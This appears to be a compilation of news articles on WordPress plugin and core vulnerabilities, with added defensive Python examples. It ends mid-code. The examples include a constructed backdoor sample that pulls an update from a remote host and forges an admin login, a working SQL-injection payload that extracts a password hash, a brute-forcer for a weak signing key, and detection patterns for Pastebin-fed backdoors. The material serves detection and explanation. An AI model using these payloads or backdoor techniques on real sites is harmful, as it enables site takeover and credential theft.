The Hacker News — Cyber Security, Hacking, Technology News

Buying popular plugins with a large user base and using them for effortless malicious campaigns has become a new trend for bad actors.

One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, WordFence security firm revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author, or any other attacker who knew how to trigger it, to gain administrative access to WordPress websites remotely without any authentication.

The plugin was configured to automatically pull an updated, backdoored version of itself from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository, without the site administrator's consent.

This backdoor code was designed to create a login session for the attacker, who is the plugin author in this case, with administrative privileges, allowing them to gain access to any of the 300,000 websites (using this plugin) remotely without requiring any authentication.

Also, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, so "triggering the same automatic update process removes all file system traces of the backdoor," making it look as if it was never there and helping the attacker avoid detection.
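As an added check for the behaviour just described (example code written for this page, not Wordfence's tooling and not the plugin's own source), the script below scans an installed plugin's PHP files for the two things a self-updating backdoor needs: a fetch-and-unpack that points at a host outside wordpress.org, and a call that can mint a logged-in session. The sample plugin text, the trigger parameter cp_auth and the trusted-host list are constructed for the example.

```python
import os
import re
import tempfile
import textwrap

# Indicators modelled on the behaviour described above. The pattern names and the
# trusted-host list are this example's own choices, not Wordfence's signatures.
REMOTE_FETCH = re.compile(
    r"\b(download_url|wp_remote_get|wp_remote_post|file_get_contents|curl_init|unzip_file)\s*\("
)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
SESSION_FORGE = re.compile(r"\b(wp_set_auth_cookie|wp_set_current_user)\s*\(")
TRUSTED_SUFFIXES = ("wordpress.org",)  # api./downloads./plugins. subdomains included


def is_trusted_host(host):
    host = host.lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def scan_php_source(src, name="<memory>"):
    """Return human-readable findings for the contents of one PHP file."""
    findings = []
    fetch_calls = sorted(set(REMOTE_FETCH.findall(src)))
    foreign_hosts = sorted({h.lower() for h in URL_HOST.findall(src) if not is_trusted_host(h)})
    if fetch_calls and foreign_hosts:
        findings.append(
            f"{name}: fetch/unpack calls ({', '.join(fetch_calls)}) alongside "
            f"non-wordpress.org hosts: {', '.join(foreign_hosts)}"
        )
    for lineno, line in enumerate(src.splitlines(), 1):
        if SESSION_FORGE.search(line):
            findings.append(f"{name}:{lineno}: session-forging call: {line.strip()}")
    return findings


def scan_plugin_dir(root):
    """Walk an installed plugin directory and scan every PHP file in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_php_source(fh.read(), os.path.relpath(path, root)))
    return findings


# Constructed sample modelled on the article's description; not the real plugin code.
BACKDOORED_SAMPLE = textwrap.dedent(r"""
    <?php
    function cp_self_update() {
        $tmp = download_url('https://simplywordpress.net/captcha/captcha_pro_update.php');
        unzip_file($tmp, WP_PLUGIN_DIR . '/captcha');
    }
    function cp_session() {
        if (isset($_GET['cp_auth'])) {    // constructed trigger parameter
            wp_set_current_user(1);
            wp_set_auth_cookie(1);
        }
    }
""")

# A plugin that only talks to the official update API should produce no findings.
CLEAN_SAMPLE = textwrap.dedent(r"""
    <?php
    function cp_check_version() {
        $r = wp_remote_get('https://api.wordpress.org/plugins/info/1.0/captcha.json');
        return wp_remote_retrieve_body($r);
    }
""")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "inc"))
        with open(os.path.join(d, "captcha.php"), "w") as fh:
            fh.write(BACKDOORED_SAMPLE)
        with open(os.path.join(d, "inc", "version.php"), "w") as fh:
            fh.write(CLEAN_SAMPLE)
        for finding in scan_plugin_dir(d):
            print(finding)
```

Because the backdoor's own update run cleans the file system traces, run the scan immediately after a plugin is installed or updated and keep the output; a scan taken later may find nothing while the site has already been logged into.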

The reason for adding a backdoor is unclear at the moment, but if someone pays a handsome amount to buy a popular plugin with a large user base, there must be a strong motive behind it.

In similar cases, we have seen organized cyber gangs acquire popular plugins and applications to stealthily infect their large user bases with malware, adware, and spyware.

While figuring out the actual identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named "Stacy Wellington" using the email address "scwellington[at]hotmail.co.uk."

Using a reverse WHOIS lookup, the researchers found a large number of other domains registered to the same user, serving plugins including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What's interesting? All of the plugins distributed through the above-mentioned domains contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence teamed up with WordPress to patch the affected version of the Captcha plugin and block the author from publishing updates, so website administrators are strongly advised to update to the latest official Captcha release, version 4.4.5.

WordFence has promised to release in-depth technical details of how the backdoor is installed and executed, along with a proof-of-concept exploit, after 30 days, so that admins have enough time to patch their websites.

A SQL injection vulnerability has been discovered in one of the most popular WordPress plugins, installed on over 300,000 websites, which could be exploited to steal databases and possibly hijack the affected sites remotely.

The flaw has been discovered in the highly popular WP Statistics plugin, which allows site administrators to get detailed information related to the number of users online on their sites, the number of visits and visitors, and page statistics.

Discovered by the Sucuri team, the WP Statistics plugin is vulnerable to a SQL injection flaw that allows a remote attacker with at least a subscriber account to steal sensitive information from the website's database and possibly gain unauthorized access to the site.

SQL injection is a web application flaw in which untrusted input is concatenated into a database query, letting the attacker change the query's meaning to map the database schema and read, modify or delete its contents.

"This vulnerability is caused by the lack of sanitization in user-provided data," researchers said. "Some attributes of the shortcode wpstatistics are being passed as parameters for important functions and this should not be a problem if those parameters were sanitized."

"One of the vulnerable functions wp_statistics_searchengine_query() in the file 'includes/functions/functions.php' is accessible through WordPress' AJAX functionality thanks to the core function wp_ajax_parse_media_shortcode()."

This function does not check for any additional privileges, which allows website subscribers to execute the shortcode and inject malicious code into its attributes.
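To make the shortcode-to-SQL path concrete, here is an added example (not the plugin's code and not Sucuri's), using SQLite in place of MySQL: a minimal shortcode attribute parser, the vulnerable query built by string concatenation, and the parameterized version. The table layout, the rows, the engine attribute name and the password hash are all constructed for the example.

```python
import re
import sqlite3

# Constructed schema and rows; the real plugin's table layout is not shown on the page.
SCHEMA = """
CREATE TABLE wp_statistics_visitor (ID INTEGER PRIMARY KEY, referred TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_statistics_visitor (referred) VALUES
    ('https://www.google.com/search?q=wordpress'),
    ('https://www.bing.com/search?q=statistics');
INSERT INTO wp_users (user_login, user_pass) VALUES ('admin', '$P$BconstructedHashNotReal0000000');
"""
LEAKED_HASH = "$P$BconstructedHashNotReal0000000"

ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\S+))""")


def parse_shortcode(text):
    """Split '[name key=value key2="v 2"]' into (name, {key: value}); a minimal
    stand-in for WordPress's shortcode_parse_atts()."""
    m = re.fullmatch(r"\s*\[(\w+)([^\]]*)\]\s*", text)
    if not m:
        raise ValueError("not a single shortcode")
    atts = {k: dq or sq or bare for k, dq, sq, bare in ATTR_RE.findall(m.group(2))}
    return m.group(1), atts


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def searchengine_count_vulnerable(conn, engine):
    # The attribute value is spliced into the statement, so it can close the LIKE
    # pattern early and append a SELECT of its own.
    sql = ("SELECT COUNT(*) FROM wp_statistics_visitor "
           "WHERE referred LIKE '%" + engine + "%'")
    return [row[0] for row in conn.execute(sql)]


def searchengine_count_fixed(conn, engine):
    # Bound parameter plus LIKE-wildcard escaping: the value can only ever be data.
    # In WordPress the equivalents are $wpdb->prepare() with %s and $wpdb->esc_like().
    escaped = engine.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = ("SELECT COUNT(*) FROM wp_statistics_visitor "
           "WHERE referred LIKE ? ESCAPE '\\'")
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


# Constructed payload a subscriber could submit through the AJAX shortcode parser.
PAYLOAD = '[wpstatistics stat=searchengine engine="bing.com%\' UNION SELECT user_pass FROM wp_users -- "]'


if __name__ == "__main__":
    name, atts = parse_shortcode(PAYLOAD)
    conn = build_db()
    print("vulnerable:", searchengine_count_vulnerable(conn, atts["engine"]))
    print("fixed:     ", searchengine_count_fixed(conn, atts["engine"]))
```

The vulnerable call returns the visitor count and, as a second row, the admin's password hash; the fixed call returns a count of zero because the injected text is matched literally. Parameterizing the query closes the injection, but the AJAX handler that reaches the shortcode should still check the caller's capabilities, since subscribers have no business running site statistics queries at all.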

Sucuri privately disclosed the flaw to the WP Statistics team, which has patched the vulnerability in its latest release, WP Statistics version 12.0.8.

So if you have a vulnerable version of the plugin installed and your website allows user registration, you are at risk and should install the latest version as soon as possible.

Last week, we reported a critical flaw in WordPress that was silently patched by the company before attackers got their hands on the bug, which could have been used to exploit millions of WordPress websites.

To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.

But despite the company's efforts to protect its users, thousands of admins did not bother to update their websites, which remain vulnerable to the critical bug, and it has already been exploited by attackers.

While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable it so they can test patches before applying them.

Even the news blog of the well-known Linux distribution openSUSE (news.opensuse.org) was hacked, though it was restored immediately and no other part of openSUSE's infrastructure was breached, CIO reports.

The vulnerability resided in the WordPress REST API and allowed an unauthenticated attacker to modify or delete any page on an unpatched website, redirect its visitors to malicious exploits, and mount a range of other attacks.

Sucuri, which privately disclosed the flaw to WordPress, said it started noticing attacks leveraging the bug less than 48 hours after disclosure, with at least four different campaigns targeting still-unpatched websites.

In one such campaign, attackers succeeded in replacing the content of over 66,000 web pages with "Hacked by" messages. The remaining campaigns targeted roughly 1,000 pages in total.

Besides defacing websites, such attacks appear to be carried out mostly for black-hat SEO campaigns, in order to spread spam and gain search engine ranking, a practice also known as search engine poisoning.

"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.

"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."

So site administrators who have not yet updated to the latest WordPress release, 4.7.2, are urged to patch immediately before becoming the next target of SEO spammers and hackers.

Last week, WordPress patched three security flaws, but just yesterday the company disclosed a then-secret critical vulnerability that let remote, unauthenticated attackers modify the content of any post or page on a WordPress site.

The bug resides in the WordPress REST API and gives rise to two issues: remote privilege escalation and content injection.

WordPress is the world's most popular content management system (CMS), used on millions of websites. The REST API was added to core and enabled by default in WordPress 4.7.0.

Flaw lets Unauthorised Hacker Redirect Visitors to Malicious Exploits

The vulnerability is easy to exploit and affects versions 4.7 and 4.7.1 of WordPress, allowing an unauthenticated attacker to modify all pages on unpatched sites, redirect visitors to malicious exploits, and mount a range of other attacks.

The vulnerability was discovered and reported by Marc-Alexandre Montpas of Sucuri to the WordPress security team, which handled the matter well by releasing a patch without disclosing details of the flaw, in an effort to keep attackers from exploiting the bug before millions of websites had applied the update.

"This privilege escalation vulnerability affects the WordPress REST API," Montpas writes in a blog post. "One of these REST endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site."
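For the two articles on this page about this REST API bug, here is an added detection example (not from Sucuri or WordPress) that triages web server access logs for successful write calls to the posts endpoint, the route the defacement campaigns abused. The log lines are constructed in Apache combined format with documentation-range IPs.

```python
import re
from collections import defaultdict

# Apache/nginx combined-format fields we need (constructed format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# The posts endpoint is reachable as /wp-json/wp/v2/posts/<id> or ?rest_route=/wp/v2/posts/<id>.
POSTS_ROUTE = re.compile(r"(?:/wp-json|[?&]rest_route=)/wp/v2/posts/(?P<id>[^/?&#]+)")
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def post_write(rec):
    """Return the post id if this record is a successful write to a single post, else None."""
    if rec["method"] not in WRITE_METHODS or not rec["status"].startswith("2"):
        return None
    m = POSTS_ROUTE.search(rec["target"])
    return m.group("id") if m else None


def triage(lines):
    """Per-source summary of successful REST writes: {ip: {"count": n, "posts": [...]}}."""
    summary = defaultdict(lambda: {"count": 0, "posts": set()})
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        post_id = post_write(rec)
        if post_id is not None:
            summary[rec["ip"]]["count"] += 1
            summary[rec["ip"]]["posts"].add(post_id)
    return {ip: {"count": v["count"], "posts": sorted(v["posts"])} for ip, v in summary.items()}


# Constructed log excerpt: one source rewriting two posts, one using the rest_route form,
# and one whose write attempt was rejected with 401.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2017:10:01:12 +0000] "GET /wp-json/wp/v2/posts/12 HTTP/1.1" 200 5120
203.0.113.7 - - [06/Feb/2017:10:01:13 +0000] "POST /wp-json/wp/v2/posts/12 HTTP/1.1" 200 2048
203.0.113.7 - - [06/Feb/2017:10:01:14 +0000] "POST /wp-json/wp/v2/posts/13 HTTP/1.1" 200 2048
198.51.100.23 - - [06/Feb/2017:10:02:00 +0000] "POST /?rest_route=/wp/v2/posts/7 HTTP/1.1" 200 1900
192.0.2.9 - - [06/Feb/2017:10:03:00 +0000] "POST /wp-json/wp/v2/posts/12 HTTP/1.1" 401 120
192.0.2.9 - - [06/Feb/2017:10:03:05 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000
""".splitlines()


if __name__ == "__main__":
    for ip, info in sorted(triage(SAMPLE_LOG).items()):
        print(f"{ip}: {info['count']} successful post write(s) -> posts {info['posts']}")
```

A legitimate editor saving from the block editor produces the same lines, so the output is a candidate list, not a verdict: correlate each source with whether it ever presented a logged-in cookie, and treat writes from sources with no authenticated session, or spread across many posts in seconds, as the defacements to check first.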

Why WordPress Delayed the Vulnerability Disclosure

The issue was discovered on January 22nd, patched on January 26th and the fix was made available in release 4.7.2 to websites using the popular CMS.

Sucuri, other security providers and hosting companies worked closely with the WordPress security team for over a week to roll out the patch, ensuring that the issue was dealt with before it became public.

The company also tipped off security companies including SiteLock, Cloudflare, and Incapsula over the nine days between disclosure and patch.

"We believe transparency is in the public's best interest...[and]... in this case, we intentionally delayed disclosing the issue by one week to ensure the safety of millions of additional WordPress sites."

"Data from all four WAFs and WordPress hosts showed no indication that the vulnerability had been exploited in the wild. As a result, we made the decision to delay disclosure of this particular issue to give time for automatic updates to run and ensure as many users as possible were protected before the issue was made public."

Patch your CMS Now!

The flaw is rated critical, but the fix was automatically deployed to millions of WordPress installations within hours of the patch being issued.

For a more technical explanation of the vulnerability, see Sucuri's official blog post.

WordPress admins who have not yet applied the patch are strongly advised to update to WordPress version 4.7.2.


Do you own a custom domain or a blog under the wordpress.com domain name?

If yes, then there is good news for you.

WordPress.com is bringing free HTTPS to every blog and website it hosts, in an effort to make the Web more secure.

WordPress – free, open source and the most popular content management system (CMS) on the Web – is used by over a quarter of all websites, so this move represents a massive shift toward a more secure Internet.

WordPress.com announced on Friday that it has partnered with the Let's Encrypt project (run by the Internet Security Research Group and backed by the Electronic Frontier Foundation, among others), allowing it to provide reliable, free HTTPS for all customers who use custom domains for their WordPress.com blogs.

Now every website hosted on wordpress.com has an SSL certificate and will display a green lock in the address bar.

"For you, the users, that means you'll see secure encryption automatically deployed on every new site within minutes. We are closing the door to unencrypted web traffic (HTTP) at every opportunity," Wordpress said in its blog post.

HTTPS has already been available for all subdomains on wordpress.com; with this update, the company also provides free certificates for custom domains that are served from the WordPress.com backend.

In short, users with custom domains (https://abcdomain.com) now receive a free certificate issued by Let's Encrypt on WordPress.com's behalf, deployed automatically on WordPress.com's servers with minimal effort on their part.

Until now, switching a web server from HTTP to HTTPS has been a hassle and an expense for website operators, and certificates have been notoriously hard to install and maintain.

With the launch of Let's Encrypt, however, anyone can obtain free SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates for their web servers and set up HTTPS in a few simple steps.

Now WordPress is also taking advantage of this free, open source initiative for its websites.

So you might have a question in your mind:

What do I need to do to activate HTTPS on my WordPress blog?

You do not need to do anything. WordPress.com is activating HTTPS on all of its millions of websites without any action on your part.

Let's Encrypt is trusted and recognized by all major browsers, including Google Chrome, Mozilla Firefox and Microsoft Internet Explorer, so you need not worry about its authenticity.

WordPress has released version 4.2.3 of its content management system (CMS) to fix a critical security vulnerability that could have been exploited to take over websites, affecting millions of sites.

WordPress version 4.2.3 resolves a Cross-Site Scripting (XSS) flaw that could allow any user with the Contributor or Author role to compromise a website, Gary Pendergast of the WordPress team wrote in a blog post on Thursday.

Cross-site scripting is a flaw in a web application's handling of untrusted input that lets an attacker inject script into pages shown to other users; it is one of the most common and most frequently exploited classes of web vulnerability.

According to the company, the vulnerability could allow an attacker to embed maliciously crafted HTML, JavaScript, Flash, or other code that bypasses WordPress's kses filtering, so that the script runs in the browser of anyone viewing the page.

This, in turn, can expose users' sensitive data, including the cookies their browsers hold for the site.

It is still unknown exactly how websites could be compromised using the flaw, as more details about the vulnerability aren't yet made available by the company.

Update your WordPress CMS Now!

WordPress 4.2.2 and earlier are affected by the flaw, but you need not worry about it if you have automatic security updates enabled.

However, if not, you are strongly recommended to update your WordPress CMS to version 4.2.3 as soon as possible.

To update WordPress, go to the main WordPress "Dashboard", then "Updates", and click "Update Now." And you are done.

A critical vulnerability has been discovered in one of the most popular plugins for the WordPress content management platform that puts more than one million websites at risk of being completely hijacked by attackers.

The vulnerability resides in most versions of the WordPress plugin WP-Slimstat. While there are more than 70 million websites on the Internet currently running WordPress, more than 1.3 million of them use the WP-Slimstat plugin, making it one of the most popular WordPress plugins for real-time web analytics.

All WP-Slimstat versions prior to the latest release, Slimstat 3.9.6, contain an easily guessable 'secret' key which is used to sign data sent to and from visitors' browsers, web security firm Sucuri explained in a blog post published Tuesday.

Once the weak secret key is recovered, an attacker can perform a SQL injection attack against the target website and extract highly sensitive information from its database, including hashed passwords and, in some configurations, the WordPress secret keys, which could be used to take over the site.

"If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote.

"Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)."

The WP-Slimstat 'secret' key is just the MD5 hash of the plugin's installation timestamp. Using sites like the Internet Archive, an attacker can easily identify the year a target website was put online.

That leaves an attacker with about 30 million values to test (one per second of that year), which a modern CPU can get through in about 10 minutes. Once the secret key is found, the attacker can use it to pull sensitive data out of the database.
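The arithmetic above, worked through as an added example (not the plugin's code and not Sucuri's): derive the secret from an installation timestamp, count the candidates in a year, and brute-force one captured signature. The plugin's real signing routine is not shown on this page, so the code assumes the signature is md5(secret || payload) and says so; the installation timestamp, the payload and the Internet Archive year are constructed.

```python
import hashlib
import time
from datetime import datetime, timezone


def install_secret(install_ts):
    """The article: the plugin's 'secret' is just the MD5 of its installation timestamp."""
    return hashlib.md5(str(install_ts).encode()).hexdigest()


def sign(secret, payload):
    """Assumed signing scheme for this example: md5(secret || payload). The page does not
    give the plugin's exact construction; the attack only needs the key space to be tiny."""
    return hashlib.md5((secret + payload).encode()).hexdigest()


def year_window(year):
    """All Unix timestamps in a calendar year (UTC): the space an attacker searches once
    the Internet Archive has shown which year the site went up."""
    start = int(datetime(year, 1, 1, tzinfo=timezone.utc).timestamp())
    end = int(datetime(year + 1, 1, 1, tzinfo=timezone.utc).timestamp())
    return start, end


def recover_secret(payload, signature, start_ts, end_ts):
    """Brute-force the installation timestamp from one observed (payload, signature) pair."""
    for ts in range(start_ts, end_ts):
        secret = install_secret(ts)
        if sign(secret, payload) == signature:
            return ts, secret
    return None


def estimate_full_year_seconds(year, sample=200_000):
    """Time `sample` candidates and extrapolate to the whole year on this CPU, single core."""
    start, end = year_window(year)
    t0 = time.perf_counter()
    recover_secret("timing-probe", "0" * 32, start, start + sample)  # never matches
    per_candidate = (time.perf_counter() - t0) / sample
    return per_candidate * (end - start)


# Constructed scenario: site installed 2014-08-26 12:00:10 UTC; the attacker has captured one
# signed tracking payload and knows from the Internet Archive that the site appeared in 2014.
INSTALL_TS = 1409054410
OBSERVED_PAYLOAD = "visitor_id=8131&resolution=1920x1080"
OBSERVED_SIG = sign(install_secret(INSTALL_TS), OBSERVED_PAYLOAD)

if __name__ == "__main__":
    start, end = year_window(2014)
    print(f"candidates in 2014: {end - start:,}")
    print(f"estimated full-year search: {estimate_full_year_seconds(2014):.0f} s on one core")
    # Narrowed to one day here so the demo finishes in well under a second.
    day_start = INSTALL_TS - INSTALL_TS % 86400
    print(recover_secret(OBSERVED_PAYLOAD, OBSERVED_SIG, day_start, day_start + 86400))
```

A non-leap year holds 31,536,000 seconds, which is the "about 30 million" in the text; the per-year estimate printed by the demo is what the "about 10 minutes" figure depends on. The fix is not a harder-to-guess timestamp but a key drawn from a CSPRNG at install time, which is what the patched release does in spirit.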

Users who run WP-Slimstat on their WordPress websites are urged to upgrade the plugin immediately to protect their sites from this dangerous vulnerability.

After the disclosure of the critical GHOST vulnerability in the GNU C Library (glibc) — a core component of most Linux distributions — security researchers have found that PHP applications, including the WordPress content management system (CMS), can also be affected by the bug.

"GHOST" is a serious vulnerability (CVE-2015-0235), announced this week by researchers at California-based security firm Qualys, involving a heap-based buffer overflow in the glibc function gethostbyname() (hence the name). The researchers said the vulnerability has been present in glibc since 2000.

Although major Linux distributors such as Red Hat, Debian and Ubuntu have already shipped updates for the flaw, GHOST can currently be used against only a handful of applications to remotely run code and silently take control of a Linux server.

As we explained in our previous article, the heap-based buffer overflow is in the __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc calls.

Since PHP applications, WordPress included, call gethostbyname() through PHP's wrapper of the same name, the bug is reachable through them, and a long-running PHP process keeps using the old library until it is restarted, even after the distribution has shipped a fix.

GHOST - BIG ISSUE FOR WORDPRESS

According to Sucuri researcher Marc-Alexandre Montpas, GHOST could be a big issue for WordPress, because the CMS uses the wp_http_validate_url() function to validate every pingback post URL.

"....And it does so by using gethostbyname()," wrote Montpas in an advisory published Wednesday. "So an attacker could leverage this vector to insert a malicious URL that would trigger a buffer overflow bug, server-side, potentially allowing him to gain privileges on the server."

The vulnerability affects glibc 2.17 and earlier. The bug was fixed in glibc 2.18 in May 2013, but the fix was not flagged as a security issue, so long-term-support distributions such as Red Hat and Ubuntu did not backport it.

HOW TO CHECK YOUR SYSTEM AGAINST GHOST FLAW

"This is a very critical vulnerability and should be treated as such," Montpas said. "If you have a dedicated server (or VPS) running Linux, you have to make sure you update it right away."

Sucuri also provided the following test PHP code, which an admin can run from the server's terminal. If the code returns a segmentation fault, the Linux server is vulnerable to GHOST.

So far, Debian 7, Red Hat Enterprise Linux 6 and 7, CentOS 6 and 7 and Ubuntu 12.04 have released updates. Users of those distributions are advised to patch their systems and then reboot as soon as possible, since running processes keep the old library loaded until they are restarted.

Disable XML-RPC

If you do not use XML-RPC, you can disable it altogether; there are also WordPress plugins that disable the XML-RPC interface completely.

Disable Pingback Requests

You may also disable the pingback feature by adding the following code to your functions.php file:
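The functions.php snippet itself is not reproduced on this page. What follows is an added verification check (Python written for this page, not WordPress code) for after either change: send system.listMethods to xmlrpc.php and confirm that pingback.ping is no longer advertised, or that XML-RPC answers with a fault. The sample responses are constructed, abbreviated versions of what a site returns.

```python
import urllib.request
import xmlrpc.client


def list_methods_request():
    """Request body for system.listMethods, the call a client sends to /xmlrpc.php."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def exposed_methods(method_response_xml):
    """Parse a methodResponse. A Fault (for example when XML-RPC is switched off entirely)
    means nothing is exposed, which is also the outcome wanted after disabling the interface."""
    try:
        params, _ = xmlrpc.client.loads(method_response_xml)
    except xmlrpc.client.Fault:
        return []
    (methods,) = params
    return list(methods)


def pingback_enabled(method_response_xml):
    return "pingback.ping" in exposed_methods(method_response_xml)


def check_site(base_url, timeout=10):
    """Live check against a site you operate (network; not exercised offline)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/xmlrpc.php",
        data=list_methods_request(),
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return pingback_enabled(resp.read().decode("utf-8", "replace"))


# Constructed responses: a default install, one with pingbacks removed, and one with XML-RPC
# disabled (method lists abbreviated; a real WordPress answers with many more wp.* methods).
RESPONSE_DEFAULT = xmlrpc.client.dumps(
    (["system.listMethods", "wp.getPosts", "pingback.ping", "pingback.extensions.getPingbacks"],),
    methodresponse=True,
)
RESPONSE_PINGBACK_REMOVED = xmlrpc.client.dumps(
    (["system.listMethods", "wp.getPosts"],), methodresponse=True
)
RESPONSE_XMLRPC_DISABLED = xmlrpc.client.dumps(
    xmlrpc.client.Fault(405, "XML-RPC services are disabled on this site."), methodresponse=True
)


if __name__ == "__main__":
    for label, xml in (("default", RESPONSE_DEFAULT),
                       ("pingback removed", RESPONSE_PINGBACK_REMOVED),
                       ("xml-rpc disabled", RESPONSE_XMLRPC_DISABLED)):
        print(f"{label}: pingback.ping exposed = {pingback_enabled(xml)}")
```

Removing pingback.ping only closes the pingback route into gethostbyname(); the rest of the XML-RPC surface (notably the multicall-based credential guessing that xmlrpc.php invites) stays open, which is why the fuller option above is to disable the interface altogether and verify that the site now returns a fault or an HTTP error for this request.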

Pastebin, the popular copy-and-paste site created more than a decade ago for software developers, and long used by hacker groups to share source code, dumps and stolen data, has more recently been leveraged by cyber criminals to target millions of users.

Compromising a website and then hosting malware on it is an old tactic, and attackers are now trying to compromise a vast number of users in a single stroke. Researchers have discovered that attackers are using Pastebin to distribute malicious backdoor code.

According to a blog post published yesterday by Denis Sinegubko, a senior malware researcher at Sucuri, the attackers are leveraging a weakness in older versions of RevSlider, a popular premium WordPress plugin. The plugin is often bundled into website themes in such a way that many site owners do not even know they have it.

To exploit the vulnerability, the attackers first check whether the target website has the RevSlider plugin; once it is found, they use a second vulnerability in RevSlider to upload a malicious backdoor to the website.

"Technically, the criminals used Pastebin for what it was built for – to share code snippets," Sinegubko wrote in a blog post. "The only catch is that the code is malicious, and it is used in illegal activity (hacking) directly off of the Pastebin website."

The researchers came across a segment of code that injects the content of a Base64-encoded $temp variable into the WordPress core file wp-links-opml.php. The code downloads its payload from the legitimate Pastebin.com site, using a request parameter named wp_nonce_once that disguises the fact that it refers to an actual Pastebin paste.

The wp_nonce_once parameter, named to resemble the nonces WordPress uses to protect against unexpected or duplicate requests, also makes the malicious code difficult to block, and at the same time "adds flexibility to the backdoor," the researcher says.

This means the backdoor can be made to download and execute any code snippet hosted on Pastebin, even one that did not exist at the time of the injection; the attacker only needs to send a request through that wp-links-opml.php file.

So far it is unclear how widespread this backdoor is, but the impact could be serious: Pastebin had 1.5 million active user accounts as of last year.

Founded in 2002, Pastebin was initially developed as an open online forum where developers could share programming code. But the site's gradual appeal to hackers of all ranks made it increasingly difficult to monitor for bad behavior. Many hacker groups share data stolen from well-known companies via the service, and some pastes are known to be used in malware attacks, carrying encrypted addresses and even base64-encoded malicious binaries.

Last month security researchers at Sucuri discovered a new type of malware threat, dubbed SoakSoak, that was modifying files in WordPress websites that used an older version of “Slider Revolution,” aka RevSlider, a slideshow plugin. At the time, the search engine giant Google blacklisted over 11,000 websites it spotted spreading the malware.


The users of WordPress, a free and open source blogging tool as well as content management system (CMS), are being informed of a widespread malware attack campaign that has already compromised more than 100,000 websites worldwide and still counting.

The news broke across the WordPress community early Sunday morning when Google blacklisted over 11,000 domains because of the latest malware campaign, which pulls its payload from SoakSoak.ru and has thus been dubbed the 'SoakSoak malware' epidemic.

With more than 70 million websites on the Internet currently running WordPress, this malware campaign is a serious threat to anyone running a WordPress site.

Once infected, you may experience irregular website behavior including unexpected redirects to SoakSoak.ru web pages. You may also end up downloading malicious files onto your computer systems automatically without any knowledge.

Google has already responded to the infection by adding over 11,000 websites to its blacklist, which can seriously hurt the revenue of the affected site owners.

The security team at Sucuri, which is actively investigating the malware's infection vector, said the infections are not limited to a single hosting provider; the impact appears across most of the WordPress hosting spectrum.

The SoakSoak malware modifies the file wp-includes/template-loader.php so that wp-includes/js/swobject.js is loaded on every page view, and that swobject.js file contains encoded malicious JavaScript.

If you run a website and are worried about the risk of infection, Sucuri provides a free SiteCheck scanner that will check your website for the malware. The exact method of intrusion has not been identified yet, but numerous signals suggest that many WordPress users may have fallen victim to this attack.
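Both the Pastebin-fed backdoor described earlier on this page (a modified wp-links-opml.php keyed on wp_nonce_once) and SoakSoak (a modified wp-includes/template-loader.php plus a dropped swobject.js) change or add WordPress core files, and a baseline hash comparison surfaces that no matter how the payload is encoded. The following is an added example, not Sucuri's SiteCheck: snapshot a tree, compare it with an earlier snapshot, and grep the changed files for strings tied to the two campaigns. The miniature WordPress tree, the file contents and the paste URL are constructed.

```python
import hashlib
import os
import re
import tempfile

# Strings tied to the two campaigns described above (constructed regexes, not vendor signatures).
IOC_PATTERNS = {
    "pastebin fetch": re.compile(r"pastebin\.com", re.I),
    "wp_nonce_once parameter": re.compile(r"wp_nonce_once"),
    "base64 payload decode": re.compile(r"base64_decode\s*\("),
    "swobject.js loader": re.compile(r"swobject\.js"),
}
CHECKED_EXT = (".php", ".js")


def sha256_file(path):
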